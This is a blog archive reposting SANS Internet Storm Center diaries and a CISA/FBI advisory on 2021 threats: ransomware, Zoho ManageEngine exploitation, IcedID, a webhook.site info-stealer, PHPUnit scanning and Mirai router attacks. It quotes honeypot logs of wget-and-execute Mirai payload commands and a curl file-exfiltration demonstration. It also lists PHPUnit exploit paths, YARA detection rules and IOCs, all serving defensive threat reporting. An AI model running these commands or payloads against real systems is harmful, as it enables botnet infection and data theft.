Category Archives: Security

A Review of Year 2021, (Sat, Dec 4th)

This post was originally published on this site

We are well on our way to closing 2021 and looking back at this year, it is easy to see that 2021 has been dominated by phishing and ransomware. With zero-day exploits in their possession, threat actors have been looking for new ways to target supply chain, source code, firmware and industrial control systems (ICS). 

For nearly 2 years now, COVID has accelerated the move to the cloud where it opens the door and widen the surface area for attacks and opened new challenges to protect data. In the first few months of this year, there were several Microsoft Exchange zero-day vulnerabilities affecting several thousand organizations  which was soon followed by SolarWinds which lead to compromised on Prem and in the Cloud.

Ransomware targeted and affected a wide range of organizations, stealing their data, encrypting it then threatened to leak it unless a ransom was paid. The actor(s) then look for something embarrassing or sensitive material that could be used to threaten to leak or sell to others. In some cases, they might research if a potential victim insurance covers ransoms payment. Some of the most publicize ransomware attack was US Colonial Pipeline[1], in Canada Newfoundland health services[2], supply chain attack against Kaseya[3], to name a few.

What could be done to help defend against phishing? Some of the things to watch for has been phishing and compromised of exposed Remote Desktop Protocol (RDP) has been a main vector for ransomware (RDP activity Diary), protect and monitor TCP/3389 for suspicious activity. Something else that can help is to setup DMARC for your DNS record to protect against domain spoofing. Patching and auditing software to ensure latest patches have been applied or risks that cannot be remediated are known, accepted and monitored against suspicious activity. Finally, good backups have been checked, tested, and verified that can be used to restore data.

What other tricks could help fight phishing and ransomware, share them via our comment section.

[1] https://www.cnn.com/2021/08/16/tech/colonial-pipeline-ransomware/index.html
[2] https://www.cbc.ca/news/canada/newfoundland-labrador/nl-cyber-attack-worst-canada-1.6236210
[3] https://www.zdnet.com/article/kaseya-ransomware-attack-1500-companies-affected-company-confirms/
[4] https://isc.sans.edu/forums/diary/Remote+Desktop+Protocol+RDP+Discovery/27984
[5] https://mxtoolbox.com/dmarc/details/how-to-setup-dmarc

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The UPX Packer Will Never Die!, (Fri, Dec 3rd)

This post was originally published on this site

Today, many malware samples that you can find in the wild are "packed". The process of packing an executable file is not new and does not mean that it is de-facto malicious. Many developers decide to pack their software to protect the code. But why malware are often packed? Because packing slows down the malware analyst job and defeats many static analysis tools. The advantages of packed malware (from an attacker's point of view) are (amongst others):

  • A reduced amount of readable strings
  • A reduced imports table
  • Modified entry point (start of the real program)

They are many packers in the wild. Some are publicly available, others are self-developed by the attackers. Most of them do not provide an "unpacker". It means that you can't easily revert to the original code. The most known packer is probably "UPX"[1]. Available for years, on both Linux and Windows, it does a good job and… includes an unpacker! This means that it's very easy to revert back to the original file.

Yesterday, I spotted an interesting PowerShell script that drops a PE file on the file system. I'm always starting with quick static analysis and saw this:

remnux@remnux:/MalwareZoo/20211203$ peframe cohernece.exe 

--------------------------------------------------------------------------------
File Information (time: 0:00:20.671049)
--------------------------------------------------------------------------------
filename         cohernece.exe
filetype         PE32 executable (GUI) Intel 80386, for MS Windows, UPX compress
filesize         53027
hash sha256      f55fb3ca7a43327157b2862390290c3df7ddf84b891f856ae720ff8a4e198b31
virustotal       /
imagebase        0x400000
entrypoint       0x1d540
imphash          d64d0be2c077062bee61cde37db4cf3e
datetime         2019-11-22 12:55:39
dll              False
directories      import, tls, resources, relocations
sections         UPX0, .rsrc, UPX1 *
features         packer

--------------------------------------------------------------------------------
Yara Plugins
--------------------------------------------------------------------------------
UPXv20MarkusLaszloReiser
UPXV200V290MarkusOberhumerLaszloMolnarJohnReiser
UPX20030XMarkusOberhumerLaszloMolnarJohnReiser
IsPE32
IsWindowsGUI
IsPacked
HasOverlay
HasRichSignature

--------------------------------------------------------------------------------
Behavior
--------------------------------------------------------------------------------
Xor

--------------------------------------------------------------------------------
Packer
--------------------------------------------------------------------------------
PackerUPX CompresorGratuito wwwupxsourceforgenet
UPX wwwupxsourceforgenet additional
yodas Protector v1033 dllocx Ashkbiz Danehkar h
UPX v0896 v102 v105 v124 Markus Laszlo overlay
UPX v0896 v102 v105 v124 Markus Laszlo overlay additional
UPX wwwupxsourceforgenet

--------------------------------------------------------------------------------
Sections Suspicious
--------------------------------------------------------------------------------
UPX1             7.90

--------------------------------------------------------------------------------
Import function
--------------------------------------------------------------------------------
ADVAPI32.dll     1
KERNEL32.DLL     4
MSVCRT.dll       1
NETAPI32.dll     1
USER32.dll       1

--------------------------------------------------------------------------------
Possibile Breakpoint
--------------------------------------------------------------------------------
ExitProcess
GetProcAddress
LoadLibraryA
VirtualProtect

--------------------------------------------------------------------------------
File
--------------------------------------------------------------------------------
ADVAPI32.dll     Library
KERNEL32.DLL     Library
MSVCRT.dll       Library
NETAPI32.dll     Library
USER32.dll       Library

--------------------------------------------------------------------------------
Fuzzing
--------------------------------------------------------------------------------
String too long

You can see plenty of indicators that conform we are dealing with a UPX-packed sample:

  • YARA rules hit
  • The name of sections ("UPX0", "UPX1")
  • A high entropy
  • A reduced imports table with function related to memory management ("VirtualProtect")

UPX being open source, they are many forks of the project, and attackers can easily fork the original project and introduce small changes. The result will be that the default (official) UPX tools won't be able to unpack the malware. Example:

remnux@remnux:/MalwareZoo/20211203$ upx -d test.exe 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: test.exe: CantUnpackException: file is possibly modified/hacked/protected; take care!

Unpacked 0 files.

But, this time, the attacker used the official UPX version and I just unpacked it:

remnux@remnux:/MalwareZoo/20211203$ upx -d cohernece-packed.exe 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
    107299 <-     53027   49.42%    win32/pe     cohernece-packed.exe

Unpacked 1 file.
remnux@remnux:/MalwareZoo/20211203$ shasum -a 256 cohernece-packed.exe 
2b9aaa9c33b5b61f747d03e79a22706c79a58a5a838017ffa2452a1f1f8183bd  cohernece-packed.exe

The unpacked PE file is a good old Mimikatz.

I don't know why the attacker still used the default UPX in this case. Except to defeat automatic triage and basic controls, it does not slow down the Malware Analyst… 

[1] https://github.com/upx/upx

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AA21-336A: APT Actors Exploiting CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus

This post was originally published on this site

Original release date: December 2, 2021

Summary

This joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9. See the ATT&CK for Enterprise framework for referenced threat actor techniques and for mitigations.

This joint advisory is the result of analytic efforts between the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) to highlight the cyber threat associated with active exploitation of a newly identified vulnerability (CVE-2021-44077) in Zoho ManageEngine ServiceDesk Plus—IT help desk software with asset management.

CVE-2021-44077, which Zoho rated critical, is an unauthenticated remote code execution (RCE) vulnerability affecting all ServiceDesk Plus versions up to, and including, version 11305. This vulnerability was addressed by the update released by Zoho on September 16, 2021 for ServiceDesk Plus versions 11306 and above. The FBI and CISA assess that advanced persistent threat (APT) cyber actors are among those exploiting the vulnerability. Successful exploitation of the vulnerability allows an attacker to upload executable files and place webshells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files. 

The Zoho update that patched this vulnerability was released on September 16, 2021, along with a security advisory. Additionally, an email advisory was sent to all ServiceDesk Plus customers with additional information. Zoho released a subsequent security advisory on November 22, 2021, and advised customers to patch immediately.

The FBI and CISA are aware of reports of malicious cyber actors likely using exploits against CVE-2021-44077 to gain access [T1190] to ManageEngine ServiceDesk Plus, as early as late October 2021. The actors have been observed using various tactics, techniques and procedures (TTPs), including:

  • Writing webshells [T1505.003] to disk for initial persistence
  • Obfuscating and Deobfuscating/Decoding Files or Information [T1027 and T1140]
  • Conducting further operations to dump user credentials [T1003]
  • Living off the land by only using signed Windows binaries for follow-on actions [T1218]
  • Adding/deleting user accounts as needed [T1136]
  • Stealing copies of the Active Directory database (NTDS.dit) [T1003.003] or registry hives
  • Using Windows Management Instrumentation (WMI) for remote execution [T1047]
  • Deleting files to remove indicators from the host [T1070.004]
  • Discovering domain accounts with the net Windows command [T1087.002]
  • Using Windows utilities to collect and archive files for exfiltration [T1560.001]
  • Using custom symmetric encryption for command and control (C2) [T1573.001]

The FBI and CISA are proactively investigating this malicious cyber activity:

  • The FBI leverages specially trained cyber squads in each of its 56 field offices and CyWatch, the FBI’s 24/7 operations center and watch floor, which provides around-the-clock support to track incidents and communicate with field offices across the country and partner agencies. 
  • CISA offers a range of no-cost cyber hygiene services to help organizations assess, identify, and reduce their exposure to threats. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors. 

Sharing technical and/or qualitative information with the FBI and CISA helps empower and amplify our capabilities as federal partners to collect and share intelligence and engage with victims, while working to unmask and hold accountable those conducting malicious cyber activities.

A STIX file will be provided when available.

For a downloadable pdf of this CSA, click here

Technical Details

Compromise of the affected systems involves exploitation of CVE-2021-44077 in ServiceDesk Plus, allowing the attacker to:

  1. Achieve an unrestricted file upload through a POST request to the ServiceDesk REST API URL and upload an executable file, C:ManageEngineServicedeskbinmsiexec.exe, with a SHA256 hash of ecd8c9967b0127a12d6db61964a82970ee5d38f82618d5db4d8eddbb3b5726b7. This executable file serves as a dropper and contains an embedded, encoded Godzilla JAR file.
  2. Gain execution for the dropper through a second POST request to a different REST API URL, which will then decode the embedded Godzilla JAR file and drop it to the filepath C:ManageEngineServiceDesklibtomcattomcat-postgres.jar with a SHA256 hash of 67ee552d7c1d46885b91628c603f24b66a9755858e098748f7e7862a71baa015.

Confirming a successful compromise of ManageEngine ServiceDesk Plus may be difficult—the attackers are known to run clean-up scripts designed to remove traces of the initial point of compromise and hide any relationship between exploitation of the vulnerability and the webshell.

Targeted Industries 

APT cyber actors have targeted Critical Infrastructure Sector industries, including the healthcare, financial services, electronics and IT consulting industries.

Indicators of Compromise 

Hashes

Webshell:

67ee552d7c1d46885b91628c603f24b66a9755858e098748f7e7862a71baa015
068D1B3813489E41116867729504C40019FF2B1FE32AAB4716D429780E666324
759bd8bd7a71a903a26ac8d5914e5b0093b96de61bf5085592be6cc96880e088
262cf67af22d37b5af2dc71d07a00ef02dc74f71380c72875ae1b29a3a5aa23d
a44a5e8e65266611d5845d88b43c9e4a9d84fe074fd18f48b50fb837fa6e429d
ce310ab611895db1767877bd1f635ee3c4350d6e17ea28f8d100313f62b87382
75574959bbdad4b4ac7b16906cd8f1fd855d2a7df8e63905ab18540e2d6f1600
5475aec3b9837b514367c89d8362a9d524bfa02e75b85b401025588839a40bcb

Dropper:

ecd8c9967b0127a12d6db61964a82970ee5d38f82618d5db4d8eddbb3b5726b7

Implant:

009d23d85c1933715c3edcccb46438690a66eebbcccb690a7b27c9483ad9d0ac 
083bdabbb87f01477f9cf61e78d19123b8099d04c93ef7ad4beb19f4a228589a
342e85a97212bb833803e06621170c67f6620f08cc220cf2d8d44dff7f4b1fa3

NGLite Backdoor:

805b92787ca7833eef5e61e2df1310e4b6544955e812e60b5f834f904623fd9f
3da8d1bfb8192f43cf5d9247035aa4445381d2d26bed981662e3db34824c71fd
5b8c307c424e777972c0fa1322844d4d04e9eb200fe9532644888c4b6386d755
3f868ac52916ebb6f6186ac20b20903f63bc8e9c460e2418f2b032a207d8f21d
342a6d21984559accbc54077db2abf61fd9c3939a4b09705f736231cbc7836ae
7e4038e18b5104683d2a33650d8c02a6a89badf30ca9174576bf0aff08c03e72

KDC Sponge:

3c90df0e02cc9b1cf1a86f9d7e6f777366c5748bd3cf4070b49460b48b4d4090
b4162f039172dcb85ca4b85c99dd77beb70743ffd2e6f9e0ba78531945577665
e391c2d3e8e4860e061f69b894cf2b1ba578a3e91de610410e7e9fa87c07304c

Malicious IIS Module:

bec067a0601a978229d291c82c35a41cd48c6fca1a3c650056521b01d15a72da

Renamed WinRAR:

d0c3d7003b7f5b4a3bd74a41709cfecfabea1f94b47e1162142de76aa7a063c7

Renamed csvde:

7d2780cd9acc516b6817e9a51b8e2889f2dec455295ac6e6d65a6191abadebff

Network Indicators

POST requests sent to the following URLs:

/RestAPI/ImportTechnicians?step=1

Domains:

seed.nkn[.]org

Note: the domain seed.nkn[.]org is a New Kind of Network (NKN) domain that provides legitimate peer to peer networking services utilizing blockchain technology for decentralization. It is possible to have false positive hits in a corporate network environment and it should be considered suspicious to see any software-initiated contacts to this domain or any subdomain.

Log File Analysis

  • Check serverOut*.txt log files under C:ManageEngineServiceDesklogs for suspicious log entries matching the following format:
    • [<time>]|[<date>]|[com.adventnet.servicedesk.setup.action.ImportTechniciansAction]|[INFO]|[62]: fileName is : msiexec.exe]

Filepaths

C:ManageEngineServiceDeskbinmsiexec.exe
C:ManageEngineServiceDesklibtomcattomcat-postgres.jar
C:WindowsTempScriptModule.dll
C:ManageEngineServiceDeskbinScriptModule.dll
C:Windowssystem32ME_ADAudit.exe
c:Users[username]AppDataRoamingADManagerME_ADManager.exe
%ALLUSERPROFILE%MicrosoftWindowsCachessystem.dat
C:ProgramDataMicrosoftCryptoRSAkey.dat
c:windowstempccc.exe

Tactics, Techniques, and Procedures

  • Using WMI for lateral movement and remote code execution (in particular, wmic.exe)
  • Using plaintext credentials for lateral movement
  • Using pg_dump.exe to dump ManageEngine databases
  • Dumping NTDS.dit and SECURITY/SYSTEM/NTUSER registry hives
  • Active credential harvesting through LSASS (KDC Sponge)
  • Exfiltrating through webshells
  • Conducting exploitation activity often through other compromised U.S. infrastructure
  • Dropping multiple webshells and/or implants to maintain persistence
  • Using renamed versions of WinRAR, csvde, and other legitimate third-party tools for reconnaissance and exfiltration

Yara Rules

rule ReportGenerate_jsp {
   strings:
      $s1 = “decrypt(fpath)”
      $s2 = “decrypt(fcontext)”
      $s3 = “decrypt(commandEnc)”
      $s4 = “upload failed!”
      $s5 = “sevck”
      $s6 = “newid”
   condition:
      filesize < 15KB and 4 of them
}

 

rule EncryptJSP {
   strings:
      $s1 = “AEScrypt”
      $s2 = “AES/CBC/PKCS5Padding”
      $s3 = “SecretKeySpec”
      $s4 = “FileOutputStream”
      $s5 = “getParameter”
      $s6 = “new ProcessBuilder”
      $s7 = “new BufferedReader”
      $s8 = “readLine()”
   condition:
      filesize < 15KB and 6 of them
}

 

rule ZimbraImplant {
    strings:
        $u1 = “User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36”
        $u2 = “Content-Type: application/soap+xml; charset=UTF-8”
        $u3 = “/service/soap”
        $u4 = “Good Luck :::)”
        $s1 = “zimBR”
        $s2 = “log10”
        $s3 = “mymain”
        $s4 = “urn:zimbraAccount”
        $s5 = “/service/upload?fmt=extended,raw”
        $s6 = “<query>(in:”inbox” or in:”junk”) is:unread</query>”
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 2MB and 1 of ($u*) and 3 of ($s*)
}

 

rule GodzillaDropper {
    strings:
        $s1 = “UEsDBAoAAAAAAI8UXFM” // base64 encoded PK/ZIP header
        $s2 = “../lib/tomcat/tomcat-postgres.jar”
        $s3 = “RunAsManager.exe”
        $s4 = “ServiceDesk”
        $s5 = “C:Userspwndocumentsvisual studio 2015Projectspayloaddll”
        $s6 = “CreateMutexA”
        $s7 = “cplusplus_me”
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 350KB and 4 of them
}

 

rule GodzillaJAR {
    strings:
        $s1 = “org/apache/tomcat/SSLFilter.class”
        $s2 = “META-INF/services/javax.servlet.ServletContainerInitializer”
        $s3 = “org/apache/tomcat/MainFilterInitializer.class”
    condition:
        uint32(0) == 0x04034B50 and filesize < 50KB and all of them
}

 

rule APT_NGLite {
    strings:
        $s1 = “/mnt/hgfs/CrossC2-2.2”
        $s2 = “WHATswrongwithU”
        $s3 = “//seed.nkn.org:”
        $s4 = “Preylistener”
        $s5 = “preyid”
        $s6 = “Www-Authenticate”
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 15MB and 4 of them
}

 

rule KDCSponge {
    strings:
        $k1 = “kdcsvc.dll”
        $k2 = “kdccli.dll”
        $k3 = “kdcsvs.dll”
        $f1 = “KerbHashPasswordEx3”
        $f2 = “KerbFreeKey”
        $f3 = “KdcVerifyEncryptedTimeStamp”
        $s1 = “download//symbols//%S//%S//%S” wide
        $s2 = “KDC Service”
        $s3 = “system.dat”
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 1MB and 1 of ($k*) and 1 of ($f*) and 1 of ($s*)

Mitigations

Compromise Mitigations

Organizations that identify any activity related to ManageEngine ServiceDesk Plus indicators of compromise within their networks should take action immediately. 

Zoho ManageEngine ServiceDesk Plus build 11306, or higher, fixes CVE-2021-44077. ManageEngine initially released a patch for this vulnerability on September 16, 2021. A subsequent security advisory was released on November 22, 2021, and advised customers to patch immediately. Additional information can be found in the Zoho security advisory released on November 22, 2021.

In addition, Zoho has set up a security response plan center that provides additional details, a downloadable tool that can be run on potentially affected systems, and a remediation guide.

FBI and CISA also strongly recommend domain-wide password resets and double Kerberos TGT password resets if any indication is found that the NTDS.dit file was compromised. 

Note: Implementing these password resets should not be taken as a comprehensive mitigation in response to this threat; additional steps may be necessary to regain administrative control of your network. Refer to your specific products mitigation guidance for details. 

Actions for Affected Organizations

Immediately report as an incident to CISA or the FBI (refer to Contact information section below) the existence of any of the following:

  • Identification of indicators of compromise as outlined above.
  • Presence of webshell code on compromised ServiceDesk Plus servers.
  • Unauthorized access to or use of accounts.
  • Evidence of lateral movement by malicious actors with access to compromised systems.
  • Other indicators of unauthorized access or compromise.

Contact Information

Recipients of this report are encouraged to contribute any additional information that they may have related to this threat. 

For any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:

Revisions

  • December 2, 2021: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

TA551 (Shathak) pushes IcedID (Bokbot), (Thu, Dec 2nd)

This post was originally published on this site

Introduction

TA551 (also known as Shathak) represents e threat actor behind malspam that has pushed different families of malware over the past few years.  So far this week, TA551 is pushing IcedID (Bokbot).


Shown above:  Flow chart for this infection.

Images from an infection


Shown above:  Screenshot from a TA551 email with sensitive information removed.

Indicators of Compromise (IOCs)

The infection process was similar to my previous diary about TA551 from August 2021, but this time it delivered IcedID instead of BazarLoader.

Associated malware:

SHA256 hash: d68fb04c96e925efcdb3484669365bed0cda22a272e486e99a43f9626019d31c

  • File size: 38,958 bytes
  • File name: request.zip
  • File description: Password-protected zip archive attached to email
  • Password: 55egs

SHA256 hash: 0a42f6762ae4f3b1d95aae0f8977cde6361f1d59b5ccc400c41772db0205f7c5

  • File size: 34,322 bytes
  • File name: charge_12.01.2021.doc
  • File description: Word doc with macros for IcedID

SHA256 hash: c7f40608ce8a3dda25c13d117790d08ef757b07b8c2ccb645a27a71adc322fb2

  • File size: 3,342 bytes
  • File location: C:Users[username]DocumentsyouTube.hta
  • File description: HTA file dropped after enabling Word macros

SHA256 hash: d54a870ba5656c5d3ddfab5f7f325c2fb8ee256b25e2872847c5ff244bc6ee6e

  • File size: 257,672 bytes
  • File location: hxxp://winrentals2017b[.]com/tegz/[long string of characters]/cab3?ref=[long string of characters]
  • File location: C:UsersPublicdowNext.jpg
  • File description: Installer DLL for IcedID
  • Run method: regsvr32.exe [filename]

SHA256 hash: cfc202b44509f2f607d365858a8218dfdc6b26f8087efcc5e46f4fef9ab53705

  • File size: 341,898 bytes
  • File location: C:Users[username]AppDataRoamingReliefEightlicense.dat
  • File description: license.dat data binary used to run persistent IcedID DLL

SHA256 hash: c340ae2dde2bd8fbae46b15abef0c7e706fe8953c837329bde409959836d6510

  • File size: 116,224 bytes
  • File location: C:Users[username]AppDataRoaming{24DB904E-86F7-2F2C-B7C1-85D8BBCE1181}MiapGiowcosi64.dll
  • File description: persistent IcedID DLL
  • Run method: rundll32.exe [filename],DllMain –giqied="[path to license.dat]"

IcedID traffic:

  • 143.204.155[.]37 port 443 – aws.amazon[.]com – HTTPS traffic
  • 87.120.254[.]190 port 80 – normyils[.]com – GET / HTTP/1.1
  • 87.120.8[.]98 port 443 – baeswea[.]com – HTTPS traffic
  • 91.92.109[.]95 port 443 – bersaww[.]com – HTTPS traffic

Final words

IcedID can be followed by Cobalt Strike when an infected host is part of an Active Directory (AD) environment.  These types of infections can deliver ransomware as a final payload in real-world environments.

But decent spam filters and best security practices can help you avoid IcedID. Default security settings in Windows 10 and Microsoft Office 2019 should prevent these types of infections from happening.

Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Info-Stealer Using webhook.site to Exfiltrate Data, (Wed, Dec 1st)

This post was originally published on this site

We already reported multiple times that, when you offer an online (cloud) service, there are a lot of chances that it will be abused for malicious purposes. I spotted an info-stealer that exfiltrates data through webhook.site. Today, many Python scripts use Discard as a C2 communication channel. This time, something different and that looks definitively less suspicious.

webhook.site is an online service that helps you to test webhooks. By definition, a webhook[1] is a technique used to modify a page or an application with custom callbacks. They are also often used to automate data manipulations. Webhooks are perfect to receive JSON data through HTTP POST requests.

The malicious tool is Hazard-Token-Grabber-V2, available on GitHub[2] for a few days. Actually, it has a very low VT score: 3/56[3]. The script extracts a lot of information from the infected system:

  • Username
  • ComputerName
  • IP
  • City
  • Region
  • Country
  • Google Maps Location
  • Screenshot of their pc
  • All Their Valid Discord Tokens (bypasses betterdiscord's anti-token-grab-protector)
  • Password For Discord (You get Their Password if They Update it)
  • Their Whole Credit Card (if They Put one in)
  • All Their Chrome Passwords And Cookies

How does work webhook.site? When you visit the page, they will generate a unique webhook for you. Now, you can just watch hit and send HTTP POST requests to it. For example, my webhook was:

https://webhook.site/4accef15-fa3b-4926-a853-2b020accd3a2

I sent this requests:

$ echo “This is a far file” >file.txt
$ curl -X POST --data-binary @file.txt hxxps://webhook[.]site/4accef15-fa3b-4926-a853-2b020accd3a2

Data is instantly received by the webhook that the attacker is probably monitoring:

A very efficient and stealthy way to exfiltrate data!

[1] https://en.wikipedia.org/wiki/Webhook
[2] https://github.com/Rdimo/Hazard-Token-Grabber-V2
[3] https://www.virustotal.com/gui/file/efe6d18849828e14855b0f493652183b39c7553621b78b89a05157705314a7b4/details

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Hunting for PHPUnit Installed via Composer, (Tue, Nov 30th)

This post was originally published on this site

One rather persistent pattern in our honeypot logs is attacks against older PHPUnit flaws. These attacks appear to exploit %%cve:2017-9841%%, a simple remote code execution vulnerability [1]. Back in 2019, Imperva called it "one of the most exploitable CVEs of 2019", and even now, attacks keep coming in [2]. After tuning one of our honeypots to be more sensitive to these attacks, we saw one to two thousand attacks against the honeypot a day (the honeypot covers multiple IP addresses).

Number of attacks/day exploiting CVE-2017-9841

So why is a four-year-old vulnerability still so popular? Looking at the exploited URLs, one pattern emerged is the inclusion of WordPress plugins and other addons that administrators may install via composer. The most common URLs are:

/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/modules/gamification/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/modules/autoupgrade/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/modules/ps_facetedsearch/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
...

One issue may be that administrators installing these plugins and extensions may not be aware that they will install and enable PHPUnit as they install the respective extension. A typical composer.json file used to install the extension will include an extension like

"require-dev": {
    "phpunit/phpunit": "^6.2.2"
},

The example above includes version 6.2.2 or later of PHPUnit if the respective module is installed with the "dev" option (composer install –dev). Luckily, only PHPUnit before 5.6.3 or 4.8.27 is vulnerable. I took a quick look at the respective composer.json files, and none of the current files requires such an old version (if it is still available). But I guess, given the heavy scanning for this vulnerability, there may still be sufficient numbers of vulnerable systems around.

This is also more of a "composer" vs. a WordPress problem. While WordPress remains a favorite target of attackers due to its popularity, composer like many similar technologies (npm, pip…) obscures some of the dependencies installed automatically and makes inventorying dependencies more difficult. As a   quick test, you could run this command:

find . -name 'composer.json' -exec egrep -H phpunit {} ;

to find all composer.json files that include a reference to PHPUnit

[1] https://nvd.nist.gov/vuln/detail/CVE-2017-9841
[2] https://www.imperva.com/blog/the-resurrection-of-phpunit-rce-vulnerability/


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Wireshark 3.6.0 Released, (Mon, Nov 29th)

This post was originally published on this site

Wireshark version 3.6.0 was released.

It has many updates and bug fixes.

There is one change I want to highlight: the behavior of operator != (not equal) in display filters. Starting with version 3.6.0, expression "a != b" is the same as "!(a == b)".

This was not the case prior to version 3.6.0, and it's something you might have noticed (I'm sure you are aware of this if you ever took my Wireshark trainings 😉 ).

When the syntax of a display filter is correct, the background color of the display filter field is green:

If the syntax is wrong, the background color is red (<> is not a valid operator here):

And if you would use the != operator, then the background color would be yellow:

Yellow means that the syntax is correct, but that the semantics might not be what you expect. That's because fields can have multiple values. For example, field ip.addr has 2 values (ip.src and ip.dst). But ip.src can also have multiple values, for example when an IP packet is embedded inside another IP packet (an ICMP packet for example).

The yellow color is a warning: check if the semantics are what you expect, and if not, rewrite your expression: "a != b" -> "!(a == b)". This would give you a green color:

Starting with version 3.6.0, the semantics of operator != have changed. "a != b" is semantically the same as "!(a == b)" now, and the yellow color no longer appears:

FYI: if you need the "old" semantics, use operator ~= (any_ne).

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Video: YARA Rules for Office Maldocs, (Sun, Nov 28th)

This post was originally published on this site

In this video, I show and explain the YARA rules I covered in diary entries "Extra Tip For Triage Of MALWARE Bazaar's Daily Malware Batches" , "Simple YARA Rules for Office Maldocs" and "YARA Rule for OOXML Maldocs: Less False Positives".

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Video: SANS Holiday Hack Challenge 2021 Q&A with Ed Skoudis, (Sat, Nov 27th)

This post was originally published on this site

The 2021 SANS Holiday Hack Challenge begins mid-December, but you can already watch "SANS Holiday Hack Challenge 2021 Q&A with Ed Skoudis" on YouTube.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Searching for Exposed ASUS Routers Vulnerable to CVE-2021-20090, (Fri, Nov 26th)

This post was originally published on this site

Over the past 7 days, my honeypot captured a few hundred POST for a vulnerability which appeared to be tracked as a critical path traversal vulnerability in the web interfaces of routers with Arcadyan firmware. If successfully exploited, could allow unauthenticated remote actors to bypass authentication and add the router to the botnet Mirai botnet.

20211125-135312: 192.168.25.9:80-103.70.155.156:44670 data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//152.89.239.12/bins/mpsl;chmod 777 *;./mpsl selfrep.asus

20211126-090429: 192.168.25.9:80-72.141.208.113:39036 data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//185.245.96.227/bins/mpsl;chmod 777 *;./mpsl selfrep.asus

Indicators Top 10 IPs

24.245.127.163
62.210.203.173
81.213.214.192
82.76.228.117
92.253.215.69
110.10.58.175
177.195.74.71
179.60.141.4
190.144.237.210
202.175.106.187

URL Indicators

http[:]//152.89.239.12/bins/mpsl
http[:]//185.245.96.227/bins/mpsl

SHA256

63e70f283398248d912d42d2963cff7965415e7bb57b43880873e570a07e8bf6

[1] https://nvd.nist.gov/vuln/detail/CVE-2021-20090
[2] https://www.tenable.com/security/research/tra-2021-13
[3] https://www.virustotal.com/gui/file/63e70f283398248d912d42d2963cff7965415e7bb57b43880873e570a07e8bf6

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.